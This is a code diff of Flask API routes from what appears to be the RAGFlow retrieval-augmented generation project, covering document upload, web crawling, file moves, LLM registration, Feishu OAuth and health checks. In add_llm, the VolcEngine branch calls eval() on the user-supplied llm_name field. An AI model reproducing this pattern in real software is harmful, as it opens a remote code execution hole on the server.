message=f"This document: '{document_id}' is not a valid document.")
_, doc = DocumentService.get_by_id(document_id) # get doc object
doc_attributes = doc.to_dict()
return construct_json_result(
data={"progress": doc_attributes["progress"], "status": TaskStatus(doc_attributes["status"]).name},
code=RetCode.SUCCESS
)
except Exception as e:
return construct_error_response(e)
# ----------------------------list the chunks of the file-----------------------------------------------------
# -- --------------------------delete the chunk-----------------------------------------------------
# ----------------------------edit the status of the chunk-----------------------------------------------------
# ----------------------------insert a new chunk-----------------------------------------------------
# ----------------------------upload a file-----------------------------------------------------
# ----------------------------get a specific chunk-----------------------------------------------------
# ----------------------------retrieval test-----------------------------------------------------

View File

@ -32,9 +32,14 @@ def set_dialog():
dialog_id = req.get("dialog_id")
name = req.get("name", "New Dialog")
description = req.get("description", "A helpful Dialog")
icon = req.get("icon", "")
top_n = req.get("top_n", 6)
top_k = req.get("top_k", 1024)
rerank_id = req.get("rerank_id", "")
if not rerank_id: req["rerank_id"] = ""
similarity_threshold = req.get("similarity_threshold", 0.1)
vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
if vector_similarity_weight is None: vector_similarity_weight = 0.3
llm_setting = req.get("llm_setting", {})
default_prompt = {
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
@ -83,8 +88,11 @@ def set_dialog():
"llm_setting": llm_setting,
"prompt_config": prompt_config,
"top_n": top_n,
"top_k": top_k,
"rerank_id": rerank_id,
"similarity_threshold": similarity_threshold,
"vector_similarity_weight": vector_similarity_weight
"vector_similarity_weight": vector_similarity_weight,
"icon": icon
}
if not DialogService.save(**dia):
return get_data_error_result(retmsg="Fail to new a dialog!")
@ -136,7 +144,7 @@ def get_kb_names(kb_ids):
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_dialogs():
try:
diags = DialogService.query(
tenant_id=current_user.id,

View File

@ -23,7 +23,7 @@ from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user
from api.db.db_models import Task
from api.db.db_models import Task, File
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.task_service import TaskService, queue_tasks
@ -33,12 +33,14 @@ from api.db.services import duplicate_name
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType, TaskStatus, ParserType
from api.db import FileType, TaskStatus, ParserType, FileSource
from api.db.services.document_service import DocumentService
from api.settings import RetCode
from api.utils.api_utils import get_json_result
from rag.utils.minio_conn import MINIO
from api.utils.file_utils import filename_type, thumbnail
from api.utils.web_utils import html2pdf, is_valid_url
from api.utils.web_utils import html2pdf, is_valid_url
@manager.route('/upload', methods=['POST'])
@ -59,12 +61,19 @@ def upload():
return get_json_result(
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
raise LookupError("Can't find this knowledgebase!")
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
kb_root_folder = FileService.get_kb_folder(current_user.id)
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
err = []
for file in file_objs:
try:
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
raise LookupError("Can't find this knowledgebase!")
MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(kb.tenant_id) >= MAX_FILE_NUM_PER_USER:
raise RuntimeError("Exceed the maximum file number of a free user!")
@ -96,9 +105,13 @@ def upload():
}
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
except Exception as e:
err.append(file.filename + ": " + str(e))
if err:
@ -107,6 +120,70 @@ def upload():
return get_json_result(data=True)
@manager.route('/web_crawl', methods=['POST'])
@login_required
@validate_request("kb_id", "name", "url")
def web_crawl():
kb_id = request.form.get("kb_id")
if not kb_id:
return get_json_result(
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
name = request.form.get("name")
url = request.form.get("url")
if not is_valid_url(url):
return get_json_result(
data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
raise LookupError("Can't find this knowledgebase!")
blob = html2pdf(url)
if not blob: return server_error_response(ValueError("Download failure."))
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
kb_root_folder = FileService.get_kb_folder(current_user.id)
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
try:
filename = duplicate_name(
DocumentService.query,
name=name+".pdf",
kb_id=kb.id)
filetype = filename_type(filename)
if filetype == FileType.OTHER.value:
raise RuntimeError("This type of file has not been supported yet!")
location = filename
while MINIO.obj_exist(kb_id, location):
location += "_"
MINIO.put(kb_id, location, blob)
doc = {
"id": get_uuid(),
"kb_id": kb.id,
"parser_id": kb.parser_id,
"parser_config": kb.parser_config,
"created_by": current_user.id,
"type": filetype,
"name": filename,
"location": location,
"size": len(blob),
"thumbnail": thumbnail(filename, blob)
}
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
except Exception as e:
return server_error_response(e)
return get_json_result(data=True)
@manager.route('/create', methods=['POST'])
@login_required
@validate_request("name", "kb_id")
@ -145,7 +222,7 @@ def create():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_docs():
kb_id = request.args.get("kb_id")
if not kb_id:
return get_json_result(
@ -228,34 +305,36 @@ def rm():
req = request.json
doc_ids = req["doc_id"]
if isinstance(doc_ids, str): doc_ids = [doc_ids]
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
errors = ""
for doc_id in doc_ids:
try:
e, doc = DocumentService.get_by_id(doc_id)
if not e:
return get_data_error_result(retmsg="Document not found!")
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
informs = File2DocumentService.get_by_document_id(doc_id)
if not informs:
MINIO.rm(doc.kb_id, doc.location)
else:
File2DocumentService.delete_by_document_id(doc_id)
f2d = File2DocumentService.get_by_document_id(doc_id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc_id)
MINIO.rm(b, n)
except Exception as e:
errors += str(e)
if errors: return server_error_response(e)
if errors:
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
return get_json_result(data=True)
@ -278,7 +357,7 @@ def run():
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
if str(req["run"]) == TaskStatus.RUNNING.value:
TaskService.filter_delete([Task.doc_id == id])
e, doc = DocumentService.get_by_id(id)
@ -307,9 +386,10 @@ def rename():
data=False,
retmsg="The extension of file can't be changed",
retcode=RetCode.ARGUMENT_ERROR)
if DocumentService.query(name=req["name"], kb_id=doc.kb_id):
return get_data_error_result(
retmsg="Duplicated document name in the same knowledgebase.")
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
if d.name == req["name"]:
return get_data_error_result(
retmsg="Duplicated document name in the same knowledgebase.")
if not DocumentService.update_by_id(
req["doc_id"], {"name": req["name"]}):
@ -334,12 +414,8 @@ def get(doc_id):
if not e:
return get_data_error_result(retmsg="Document not found!")
informs = File2DocumentService.get_by_document_id(doc_id)
if not informs:
response = flask.make_response(MINIO.get(doc.kb_id, doc.location))
else:
e, file = FileService.get_by_id(informs[0].file_id)
response = flask.make_response(MINIO.get(file.parent_id, doc.location))
b,n = File2DocumentService.get_minio_address(doc_id=doc_id)
response = flask.make_response(MINIO.get(b, n))
ext = re.search(r"\.([^.]+)$", doc.name)
if ext:

View File

@ -58,11 +58,7 @@ def convert():
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
File2DocumentService.delete_by_file_id(id)
@ -125,11 +121,7 @@ def rm():
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
return get_json_result(data=True)

View File

@ -26,7 +26,7 @@ from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType
from api.db import FileType, FileSource
from api.db.services import duplicate_name
from api.db.services.file_service import FileService
from api.settings import RetCode
@ -45,7 +45,7 @@ def upload():
if not pf_id:
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder.id
pf_id = root_folder["id"]
if 'file' not in request.files:
return get_json_result(
@ -132,7 +132,7 @@ def create():
input_file_type = request.json.get("type")
if not pf_id:
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder.id
pf_id = root_folder["id"]
try:
if not FileService.is_parent_folder_exist(pf_id):
@ -165,7 +165,7 @@ def create():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_files():
pf_id = request.args.get("parent_id")
keywords = request.args.get("keywords", "")
@ -176,7 +176,8 @@ def list():
desc = request.args.get("desc", True)
if not pf_id:
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder.id
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
try:
e, file = FileService.get_by_id(pf_id)
if not e:
@ -199,7 +200,7 @@ def list():
def get_root_folder():
try:
root_folder = FileService.get_root_folder(current_user.id)
return get_json_result(data={"root_folder": root_folder.to_json()})
return get_json_result(data={"root_folder": root_folder})
except Exception as e:
return server_error_response(e)
@ -250,6 +251,8 @@ def rm():
return get_data_error_result(retmsg="File or Folder not found!")
if not file.tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
if file.source_type == FileSource.KNOWLEDGEBASE:
continue
if file.type == FileType.FOLDER.value:
file_id_list = FileService.get_all_innermost_file_ids(file_id, [])
@ -274,11 +277,7 @@ def rm():
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
File2DocumentService.delete_by_file_id(file_id)
@ -303,9 +302,10 @@ def rename():
data=False,
retmsg="The extension of file can't be changed",
retcode=RetCode.ARGUMENT_ERROR)
if FileService.query(name=req["name"], pf_id=file.parent_id):
return get_data_error_result(
retmsg="Duplicated file name in the same folder.")
for file in FileService.query(name=req["name"], pf_id=file.parent_id):
if file.name == req["name"]:
return get_data_error_result(
retmsg="Duplicated file name in the same folder.")
if not FileService.update_by_id(
req["file_id"], {"name": req["name"]}):
@ -331,8 +331,8 @@ def get(file_id):
e, file = FileService.get_by_id(file_id)
if not e:
return get_data_error_result(retmsg="Document not found!")
response = flask.make_response(MINIO.get(file.parent_id, file.location))
b, n = File2DocumentService.get_minio_address(file_id=file_id)
response = flask.make_response(MINIO.get(b, n))
ext = re.search(r"\.([^.]+)$", file.name)
if ext:
if file.type == FileType.VISUAL.value:
@ -343,5 +343,28 @@ def get(file_id):
'application/%s' %
ext.group(1))
return response
except Exception as e:
return server_error_response(e)
@manager.route('/mv', methods=['POST'])
@login_required
@validate_request("src_file_ids", "dest_file_id")
def move():
req = request.json
try:
file_ids = req["src_file_ids"]
parent_id = req["dest_file_id"]
for file_id in file_ids:
e, file = FileService.get_by_id(file_id)
if not e:
return get_data_error_result(retmsg="File or Folder not found!")
if not file.tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
fe, _ = FileService.get_by_id(parent_id)
if not fe:
return get_data_error_result(retmsg="Parent Folder not found!")
FileService.move_file(file_ids, parent_id)
return get_json_result(data=True)
except Exception as e:
return server_error_response(e)

View File

@ -19,12 +19,14 @@ from flask_login import login_required, current_user
from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.user_service import TenantService, UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid, get_format_time
from api.db import StatusEnum, UserTenantRole
from api.db import StatusEnum, UserTenantRole, FileSource
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.db_models import Knowledgebase
from api.db.db_models import Knowledgebase, File
from api.settings import stat_logger, RetCode
from api.utils.api_utils import get_json_result
from rag.nlp import search
@ -109,7 +111,7 @@ def detail():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_kbs():
page_number = request.args.get("page", 1)
items_per_page = request.args.get("page_size", 150)
orderby = request.args.get("orderby", "create_time")
@ -136,17 +138,14 @@ def rm():
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
for doc in DocumentService.query(kb_id=req["kb_id"]):
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(kbs[0].tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, kbs[0].tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
f2d = File2DocumentService.get_by_document_id(doc.id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc.id)
if not KnowledgebaseService.update_by_id(
req["kb_id"], {"status": StatusEnum.INVALID.value}):
if not KnowledgebaseService.delete_by_id(req["kb_id"]):
return get_data_error_result(
retmsg="Database error (Knowledgebase removal)!")
return get_json_result(data=True)

View File

@ -20,15 +20,15 @@ from api.utils.api_utils import server_error_response, get_data_error_result, va
from api.db import StatusEnum, LLMType
from api.db.db_models import TenantLLM
from api.utils.api_utils import get_json_result
from rag.llm import EmbeddingModel, ChatModel
from rag.llm import EmbeddingModel, ChatModel, RerankModel,CvModel
import requests
@manager.route('/factories', methods=['GET'])
@login_required
def factories():
try:
fac = LLMFactoriesService.get_all()
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed"]])
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed", "BAAI"]])
except Exception as e:
return server_error_response(e)
@ -39,31 +39,43 @@ def factories():
def set_api_key():
req = request.json
# test if api key works
chat_passed = False
chat_passed, embd_passed, rerank_passed = False, False, False
factory = req["llm_factory"]
msg = ""
for llm in LLMService.query(fid=factory):
if llm.model_type == LLMType.EMBEDDING.value:
if not embd_passed and llm.model_type == LLMType.EMBEDDING.value:
mdl = EmbeddingModel[factory](
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
try:
arr, tc = mdl.encode(["Test if the api key is available"])
if len(arr[0]) == 0 or tc == 0:
raise Exception("Fail")
embd_passed = True
except Exception as e:
msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
elif not chat_passed and llm.model_type == LLMType.CHAT.value:
mdl = ChatModel[factory](
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
try:
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
"temperature": 0.9})
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}],
{"temperature": 0.9,'max_tokens':50})
if not tc:
raise Exception(m)
chat_passed = True
except Exception as e:
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
e)
chat_passed = True
elif not rerank_passed and llm.model_type == LLMType.RERANK:
mdl = RerankModel[factory](
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
try:
arr, tc = mdl.similarity("What's the weather?", ["Is it sunny today?"])
if len(arr) == 0 or tc == 0:
raise Exception("Fail")
except Exception as e:
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
e)
rerank_passed = True
if msg:
return get_data_error_result(retmsg=msg)
@ -96,20 +108,46 @@ def set_api_key():
@validate_request("llm_factory", "llm_name", "model_type")
def add_llm():
req = request.json
factory = req["llm_factory"]
if factory == "VolcEngine":
# For VolcEngine, due to its special authentication method
# Assemble volc_ak, volc_sk, endpoint_id into api_key
temp = list(eval(req["llm_name"]).items())[0]
llm_name = temp[0]
endpoint_id = temp[1]
api_key = '{' + f'"volc_ak": "{req.get("volc_ak", "")}", ' \
f'"volc_sk": "{req.get("volc_sk", "")}", ' \
f'"ep_id": "{endpoint_id}", ' + '}'
elif factory == "Bedrock":
# For Bedrock, due to its special authentication method
# Assemble bedrock_ak, bedrock_sk, bedrock_region
llm_name = req["llm_name"]
api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
elif factory == "LocalAI":
llm_name = req["llm_name"]+"___LocalAI"
api_key = "xxxxxxxxxxxxxxx"
else:
llm_name = req["llm_name"]
api_key = "xxxxxxxxxxxxxxx"
llm = {
"tenant_id": current_user.id,
"llm_factory": req["llm_factory"],
"llm_factory": factory,
"model_type": req["model_type"],
"llm_name": req["llm_name"],
"llm_name": llm_name,
"api_base": req.get("api_base", ""),
"api_key": "xxxxxxxxxxxxxxx"
"api_key": api_key
}
factory = req["llm_factory"]
msg = ""
if llm["model_type"] == LLMType.EMBEDDING.value:
mdl = EmbeddingModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
model_name=llm["llm_name"],
base_url=llm["api_base"])
try:
arr, tc = mdl.encode(["Test if the api key is available"])
if len(arr[0]) == 0 or tc == 0:
@ -118,7 +156,10 @@ def add_llm():
msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
elif llm["model_type"] == LLMType.CHAT.value:
mdl = ChatModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
model_name=llm["llm_name"],
base_url=llm["api_base"]
)
try:
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
"temperature": 0.9})
@ -127,6 +168,36 @@ def add_llm():
except Exception as e:
msg += f"\nFail to access model({llm['llm_name']})." + str(
e)
elif llm["model_type"] == LLMType.RERANK:
mdl = RerankModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"]
)
try:
arr, tc = mdl.similarity("Hello~ Ragflower!", ["Hi, there!"])
if len(arr) == 0 or tc == 0:
raise Exception("Not known.")
except Exception as e:
msg += f"\nFail to access model({llm['llm_name']})." + str(
e)
elif llm["model_type"] == LLMType.IMAGE2TEXT.value:
mdl = CvModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"]
)
try:
img_url = (
"https://upload.wikimedia.org/wikipedia/comm"
"ons/thumb/d/dd/Gfp-wisconsin-madison-the-nature-boardwalk.jpg/256"
"0px-Gfp-wisconsin-madison-the-nature-boardwalk.jpg"
)
res = requests.get(img_url)
if res.status_code == 200:
m, tc = mdl.describe(res.content)
if not tc:
raise Exception(m)
else:
pass
except Exception as e:
msg += f"\nFail to access model({llm['llm_name']})." + str(e)
else:
# TODO: check other type of models
pass
@ -134,7 +205,6 @@ def add_llm():
if msg:
return get_data_error_result(retmsg=msg)
if not TenantLLMService.filter_update(
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
TenantLLMService.save(**llm)
@ -142,6 +212,16 @@ def add_llm():
return get_json_result(data=True)
@manager.route('/delete_llm', methods=['POST'])
@login_required
@validate_request("llm_factory", "llm_name")
def delete_llm():
req = request.json
TenantLLMService.filter_delete(
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
return get_json_result(data=True)
@manager.route('/my_llms', methods=['GET'])
@login_required
def my_llms():
@ -165,7 +245,7 @@ def my_llms():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_app():
model_type = request.args.get("model_type")
try:
objs = TenantLLMService.query(tenant_id=current_user.id)
@ -174,7 +254,7 @@ def list():
llms = [m.to_dict()
for m in llms if m.status == StatusEnum.VALID.value]
for m in llms:
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed"]
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed", "BAAI"]
llm_set = set([m["llm_name"] for m in llms])
for o in objs:
@ -184,7 +264,7 @@ def list():
res = {}
for m in llms:
if model_type and m["model_type"] != model_type:
if model_type and m["model_type"].find(model_type)<0:
continue
if m["fid"] not in res:
res[m["fid"]] = []

68
api/apps/system_app.py Normal file
View File

@ -0,0 +1,68 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
from flask_login import login_required
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import get_json_result
from api.versions import get_rag_version
from rag.settings import SVR_QUEUE_NAME
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
from timeit import default_timer as timer
from rag.utils.redis_conn import REDIS_CONN
@manager.route('/version', methods=['GET'])
@login_required
def version():
return get_json_result(data=get_rag_version())
@manager.route('/status', methods=['GET'])
@login_required
def status():
res = {}
st = timer()
try:
res["es"] = ELASTICSEARCH.health()
res["es"]["elapsed"] = "{:.1f}".format((timer() - st)*1000.)
except Exception as e:
res["es"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
st = timer()
try:
MINIO.health()
res["minio"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
except Exception as e:
res["minio"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
st = timer()
try:
KnowledgebaseService.get_by_id("x")
res["mysql"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
except Exception as e:
res["mysql"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
st = timer()
try:
if not REDIS_CONN.health():
raise Exception("Lost connection!")
res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
except Exception as e:
res["redis"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
return get_json_result(data=res)

View File

@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import re
from datetime import datetime
@ -25,8 +26,9 @@ from api.db.services.llm_service import TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, validate_request
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
from api.db import UserTenantRole, LLMType, FileType
from api.settings import RetCode, GITHUB_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, API_KEY, \
LLM_FACTORY, LLM_BASE_URL
from api.settings import RetCode, GITHUB_OAUTH, FEISHU_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, \
API_KEY, \
LLM_FACTORY, LLM_BASE_URL, RERANK_MDL
from api.db.services.user_service import UserService, TenantService, UserTenantService
from api.db.services.file_service import FileService
from api.settings import stat_logger
@ -122,6 +124,79 @@ def github_callback():
return redirect("/?auth=%s" % user.get_id())
@manager.route('/feishu_callback', methods=['GET'])
def feishu_callback():
import requests
app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"), data=json.dumps({
"app_id": FEISHU_OAUTH.get("app_id"),
"app_secret": FEISHU_OAUTH.get("app_secret")
}), headers={"Content-Type": "application/json; charset=utf-8"})
app_access_token_res = app_access_token_res.json()
if app_access_token_res['code'] != 0:
return redirect("/?error=%s" % app_access_token_res)
res = requests.post(FEISHU_OAUTH.get("user_access_token_url"), data=json.dumps({
"grant_type": FEISHU_OAUTH.get("grant_type"),
"code": request.args.get('code')
}), headers={"Content-Type": "application/json; charset=utf-8",
'Authorization': f"Bearer {app_access_token_res['app_access_token']}"})
res = res.json()
if res['code'] != 0:
return redirect("/?error=%s" % res["message"])
if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
return redirect("/?error=contact:user.email:readonly not in scope")
session["access_token"] = res["data"]["access_token"]
session["access_token_from"] = "feishu"
userinfo = user_info_from_feishu(session["access_token"])
users = UserService.query(email=userinfo["email"])
user_id = get_uuid()
if not users:
try:
try:
avatar = download_img(userinfo["avatar_url"])
except Exception as e:
stat_logger.exception(e)
avatar = ""
users = user_register(user_id, {
"access_token": session["access_token"],
"email": userinfo["email"],
"avatar": avatar,
"nickname": userinfo["en_name"],
"login_channel": "feishu",
"last_login_time": get_format_time(),
"is_superuser": False,
})
if not users:
raise Exception('Register user failure.')
if len(users) > 1:
raise Exception('Same E-mail exist!')
user = users[0]
login_user(user)
return redirect("/?auth=%s" % user.get_id())
except Exception as e:
rollback_user_registration(user_id)
stat_logger.exception(e)
return redirect("/?error=%s" % str(e))
user = users[0]
user.access_token = get_uuid()
login_user(user)
user.save()
return redirect("/?auth=%s" % user.get_id())
def user_info_from_feishu(access_token):
import requests
headers = {"Content-Type": "application/json; charset=utf-8",
'Authorization': f"Bearer {access_token}"}
res = requests.get(
f"https://open.feishu.cn/open-apis/authen/v1/user_info",
headers=headers)
user_info = res.json()["data"]
user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
return user_info
def user_info_from_github(access_token):
import requests
headers = {"Accept": "application/json",
@ -200,7 +275,7 @@ def rollback_user_registration(user_id):
except Exception as e:
pass
try:
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).excute()
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
except Exception as e:
pass
@ -214,7 +289,8 @@ def user_register(user_id, user):
"embd_id": EMBEDDING_MDL,
"asr_id": ASR_MDL,
"parser_ids": PARSERS,
"img2txt_id": IMAGE2TEXT_MDL
"img2txt_id": IMAGE2TEXT_MDL,
"rerank_id": RERANK_MDL
}
usr_tenant = {
"tenant_id": user_id,

16
api/contants.py Normal file
View File

@ -0,0 +1,16 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
NAME_LENGTH_LIMIT = 2 ** 10

View File

@ -54,6 +54,7 @@ class LLMType(StrEnum):
EMBEDDING = 'embedding'
SPEECH2TEXT = 'speech2text'
IMAGE2TEXT = 'image2text'
RERANK = 'rerank'
class ChatStyle(StrEnum):
@ -83,3 +84,18 @@ class ParserType(StrEnum):
NAIVE = "naive"
PICTURE = "picture"
ONE = "one"
AUDIO = "audio"
KG = "knowledge_graph"
class FileSource(StrEnum):
LOCAL = ""
KNOWLEDGEBASE = "knowledgebase"
S3 = "s3"
class CanvasType(StrEnum):
ChatBot = "chatbot"
DocBot = "docbot"
